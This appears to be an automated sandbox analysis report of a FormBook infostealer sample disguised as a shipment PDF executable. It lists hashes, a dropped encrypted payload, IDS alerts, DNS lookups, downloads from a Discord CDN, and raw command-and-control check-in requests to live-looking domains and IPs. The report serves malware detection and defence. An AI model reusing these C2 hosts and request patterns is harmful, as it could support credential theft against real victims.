                                                Preview: ...2z.....d.M..*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....x......}...T.BT..P.n.k..X....c..."OT...'.v....G..<.cgn.R.X........u.8..1.)..@.6(t..k...L(u...*.r.~.uu;......ca|.J%.\.2f..~..*E....X....u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........0..NA .c...............#XY.._...!C/w..6.`l..H....;...=...t<L..2..y"..jVrIi.<.u..6....9[..m.. ..._.-..U.pPv.S..$.M)r.,.U....2...A.!&.prF*.*....N....6...E4..+=-4.tq.....F..y..r.."..;..,.6.......>._.<....5......8..;.G%E.. ......|;.......<.0.F.&.5....Y...:.i.U..3{..VZH.2.Z_.0.)~....,..PR
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq[2]
                                                Process:C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):283648
                                                Entropy (8bit):7.994889215647494
                                                Encrypted:true
                                                SSDEEP:6144:gMA9BxHSi2cVMq/CLqa1tZ92u8TXVIipNEl+yRDz16w:gMUBxHSi2cS1tR8ZIipNEJF1f
                                                MD5:0584CD5C8571B60FAAA2811123AC81CE
                                                SHA1:4DC74072350C1DA5B6A392B4597539BF875B01FF
                                                SHA-256:D297A238CA27D092A1A7EC63CB87C629172B50184E4C7DECC2EB0B4008F81BEE
                                                SHA-512:380CBA730298A4C51E11B85B59453E09D73965330CAE5A2F0AF12856832FFF15E5CE81A521C33B22D1A1B57F753A6849B78A3963CF02F9AE3BA5C8145D60DCCA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...2z.....d.M..*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....x......}...T.BT..P.n.k..X....c..."OT...'.v....G..<.cgn.R.X........u.8..1.)..@.6(t..k...L(u...*.r.~.uu;......ca|.J%.\.2f..~..*E....X....u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........0..NA .c...............#XY.._...!C/w..6.`l..H....;...=...t<L..2..y"..jVrIi.<.u..6....9[..m.. ..._.-..U.pPv.S..$.M)r.,.U....2...A.!&.prF*.*....N....6...E4..+=-4.tq.....F..y..r.."..;..,.6.......>._.<....5......8..;.G%E.. ......|;.......<.0.F.&.5....Y...:.i.U..3{..VZH.2.Z_.0.)~....,..PR

                                                Static File Info

                                                General

                                                File type:
                                                Entropy (8bit):7.1389128083091045
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.38%
                                                • InstallShield setup (43055/19) 0.43%
                                                • Windows Screen Saver (13104/52) 0.13%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                File name:Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                File size:796160
                                                MD5:e954c3d029b943b054fceb27e5e24d2d
                                                SHA1:927f6633500965f008ab556a0c1004c095e004ee
                                                SHA256:a0703367806de16bac9c75c016780c0bf3b1d8c21cf7f51b6a47b6a1aba74999
                                                SHA512:0be2b0b19e19f0b492e50931dc0fb311450abeabc19250619708fc333855b9fc0caf85b6ba01bd5423d9e11b127e880c2827df3a499b02b553789892377843c0
                                                SSDEEP:12288:oP3Sd0k2b6Yf1ls9oJ2mF6LIosXFHJ1kUH1N+BfZ8fQOwm6V:ofQob6CEoJ2OpXXp7mZ8I
                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                File Icon

                                                Icon Hash:88c7ce1c995c2711

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                10/13/21-20:37:08.779412TCP1201ATTACK-RESPONSES 403 Forbidden804979837.123.118.150192.168.2.5
                                                10/13/21-20:37:31.949463ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                10/13/21-20:37:41.542719TCP1201ATTACK-RESPONSES 403 Forbidden804980734.102.136.180192.168.2.5
                                                10/13/21-20:37:46.748890TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.535.209.104.90
                                                10/13/21-20:37:46.748890TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.535.209.104.90
                                                10/13/21-20:37:46.748890TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.535.209.104.90
                                                10/13/21-20:37:52.019708TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.534.102.136.180
                                                10/13/21-20:37:52.019708TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.534.102.136.180
                                                10/13/21-20:37:52.019708TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.534.102.136.180
                                                10/13/21-20:37:52.135817TCP1201ATTACK-RESPONSES 403 Forbidden804980934.102.136.180192.168.2.5

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 13, 2021 20:35:47.203191042 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.203244925 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.203340054 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.242621899 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.242655039 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.285016060 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.285156012 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.635562897 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.635586977 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.635850906 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.635937929 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.656991959 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.696875095 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.696952105 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.696980953 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697032928 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697035074 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697074890 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697082996 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697088003 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697127104 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697130919 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697166920 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697202921 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697231054 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697233915 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697247028 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697258949 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697266102 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697340012 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697345018 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697346926 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.697355986 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.697402000 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.698046923 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.698112011 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.698123932 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.698143959 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.698156118 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.698184967 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.698199987 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.698210001 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.698236942 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.698266029 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.699003935 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.699059010 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.699088097 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.699100018 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.699136972 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.699146986 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.699151993 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.699209929 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.699220896 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.699270010 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.699903965 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.699953079 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.699956894 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.699980021 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.700006962 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.700021029 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.700037956 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.700126886 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.700138092 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.700176001 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.700813055 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.700892925 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.712812901 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.712889910 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.712918043 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.712928057 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.712948084 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.713007927 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.713022947 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.713030100 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.713076115 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.713088989 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.713141918 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.713154078 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.713186026 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.713205099 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.713217020 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.713227034 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.713260889 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.714175940 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.714248896 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.714281082 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.714282036 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.714304924 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.714369059 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.715065956 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.715337038 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.715611935 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.715652943 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.715692043 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.715713978 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.715728998 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.715759039 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.716533899 CEST44349731162.159.129.233192.168.2.5
                                                Oct 13, 2021 20:35:47.716619015 CEST49731443192.168.2.5162.159.129.233
                                                Oct 13, 2021 20:35:47.716628075 CEST44349731162.159.129.233192.168.2.5

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 13, 2021 20:35:47.133038044 CEST6180553192.168.2.58.8.8.8
                                                Oct 13, 2021 20:35:47.154841900 CEST53618058.8.8.8192.168.2.5
                                                Oct 13, 2021 20:36:04.792063951 CEST4955753192.168.2.58.8.8.8
                                                Oct 13, 2021 20:36:04.812284946 CEST53495578.8.8.8192.168.2.5
                                                Oct 13, 2021 20:36:11.558885098 CEST6173353192.168.2.58.8.8.8
                                                Oct 13, 2021 20:36:11.579682112 CEST53617338.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:03.608495951 CEST6217653192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:03.650125980 CEST53621768.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:08.684832096 CEST6529653192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:08.706600904 CEST53652968.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:13.811350107 CEST6318353192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:13.866471052 CEST53631838.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:18.976485014 CEST6015153192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:18.998541117 CEST53601518.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:29.061887980 CEST5696953192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:30.087512016 CEST5696953192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:30.904611111 CEST53569698.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:31.949279070 CEST53569698.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:35.974653006 CEST5516153192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:36.083981037 CEST53551618.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:41.374521971 CEST6007553192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:41.407979012 CEST53600758.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:46.565393925 CEST5501653192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:46.583389044 CEST53550168.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:51.939376116 CEST6434553192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:51.974000931 CEST53643458.8.8.8192.168.2.5
                                                Oct 13, 2021 20:37:57.153471947 CEST5712853192.168.2.58.8.8.8
                                                Oct 13, 2021 20:37:57.206331968 CEST53571288.8.8.8192.168.2.5

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Oct 13, 2021 20:37:31.949462891 CEST192.168.2.58.8.8.8cff9(Port unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Oct 13, 2021 20:35:47.133038044 CEST192.168.2.58.8.8.80xbc6Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:04.792063951 CEST192.168.2.58.8.8.80xa581Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:11.558885098 CEST192.168.2.58.8.8.80x4a04Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:03.608495951 CEST192.168.2.58.8.8.80x36a3Standard query (0)www.mmfaccao.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:08.684832096 CEST192.168.2.58.8.8.80xc2fdStandard query (0)www.blttsperma.questA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:13.811350107 CEST192.168.2.58.8.8.80x58efStandard query (0)www.jkformationfrance.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:18.976485014 CEST192.168.2.58.8.8.80xf0feStandard query (0)www.bombers.xyzA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:29.061887980 CEST192.168.2.58.8.8.80x112bStandard query (0)www.lnvietnam.onlineA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:30.087512016 CEST192.168.2.58.8.8.80x112bStandard query (0)www.lnvietnam.onlineA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:35.974653006 CEST192.168.2.58.8.8.80x2e6eStandard query (0)www.goodtasteonline.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:41.374521971 CEST192.168.2.58.8.8.80xc463Standard query (0)www.alltart.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:46.565393925 CEST192.168.2.58.8.8.80x2a06Standard query (0)www.thesidehustler.netA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:51.939376116 CEST192.168.2.58.8.8.80x520cStandard query (0)www.eimzaizmir.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:57.153471947 CEST192.168.2.58.8.8.80xf655Standard query (0)www.pampelina.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Oct 13, 2021 20:35:47.154841900 CEST8.8.8.8192.168.2.50xbc6No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:35:47.154841900 CEST8.8.8.8192.168.2.50xbc6No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:35:47.154841900 CEST8.8.8.8192.168.2.50xbc6No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:35:47.154841900 CEST8.8.8.8192.168.2.50xbc6No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:35:47.154841900 CEST8.8.8.8192.168.2.50xbc6No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:04.812284946 CEST8.8.8.8192.168.2.50xa581No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:04.812284946 CEST8.8.8.8192.168.2.50xa581No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:04.812284946 CEST8.8.8.8192.168.2.50xa581No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:04.812284946 CEST8.8.8.8192.168.2.50xa581No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:04.812284946 CEST8.8.8.8192.168.2.50xa581No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:11.579682112 CEST8.8.8.8192.168.2.50x4a04No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:11.579682112 CEST8.8.8.8192.168.2.50x4a04No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:11.579682112 CEST8.8.8.8192.168.2.50x4a04No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:11.579682112 CEST8.8.8.8192.168.2.50x4a04No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:36:11.579682112 CEST8.8.8.8192.168.2.50x4a04No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:03.650125980 CEST8.8.8.8192.168.2.50x36a3Name error (3)www.mmfaccao.comnonenoneA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:08.706600904 CEST8.8.8.8192.168.2.50xc2fdNo error (0)www.blttsperma.quest37.123.118.150A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:13.866471052 CEST8.8.8.8192.168.2.50x58efNo error (0)www.jkformationfrance.com213.186.33.5A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:18.998541117 CEST8.8.8.8192.168.2.50xf0feNo error (0)www.bombers.xyz3.64.163.50A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:30.904611111 CEST8.8.8.8192.168.2.50x112bServer failure (2)www.lnvietnam.onlinenonenoneA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:31.949279070 CEST8.8.8.8192.168.2.50x112bServer failure (2)www.lnvietnam.onlinenonenoneA (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:36.083981037 CEST8.8.8.8192.168.2.50x2e6eNo error (0)www.goodtasteonline.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 20:37:36.083981037 CEST8.8.8.8192.168.2.50x2e6eNo error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:41.407979012 CEST8.8.8.8192.168.2.50xc463No error (0)www.alltart.comalltart.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 20:37:41.407979012 CEST8.8.8.8192.168.2.50xc463No error (0)alltart.com34.102.136.180A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:46.583389044 CEST8.8.8.8192.168.2.50x2a06No error (0)www.thesidehustler.net35.209.104.90A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:51.974000931 CEST8.8.8.8192.168.2.50x520cNo error (0)www.eimzaizmir.comeimzaizmir.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 20:37:51.974000931 CEST8.8.8.8192.168.2.50x520cNo error (0)eimzaizmir.com34.102.136.180A (IP address)IN (0x0001)
                                                Oct 13, 2021 20:37:57.206331968 CEST8.8.8.8192.168.2.50xf655No error (0)www.pampelina.compampelina.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 20:37:57.206331968 CEST8.8.8.8192.168.2.50xf655No error (0)pampelina.com81.2.194.128A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • cdn.discordapp.com
                                                • www.blttsperma.quest
                                                • www.jkformationfrance.com
                                                • www.bombers.xyz
                                                • www.goodtasteonline.com
                                                • www.alltart.com
                                                • www.thesidehustler.net
                                                • www.eimzaizmir.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.549731162.159.129.233443C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.549733162.159.129.233443C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                10192.168.2.54980934.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 20:37:52.019707918 CEST7579OUTGET /epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6 HTTP/1.1
                                                Host: www.eimzaizmir.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 20:37:52.135817051 CEST7580INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 18:37:52 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f9601-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.549757162.159.133.233443C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.549760162.159.134.233443C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.54979837.123.118.15080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 20:37:08.746144056 CEST6690OUTGET /epns/?5jz=Qaf9b58Tbh8Z520YhGjeYYsoKHR90rBEG3FUA1hNyjMgDr+YB08dwxAknUVnxeGDxphK&wVzHJ=BRWdQ6 HTTP/1.1
                                                Host: www.blttsperma.quest
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 20:37:08.779412031 CEST6690INHTTP/1.1 403 Forbidden
                                                Server: nginx/1.10.3 (Ubuntu)
                                                Date: Wed, 13 Oct 2021 18:37:08 GMT
                                                Content-Type: text/html
                                                Content-Length: 178
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


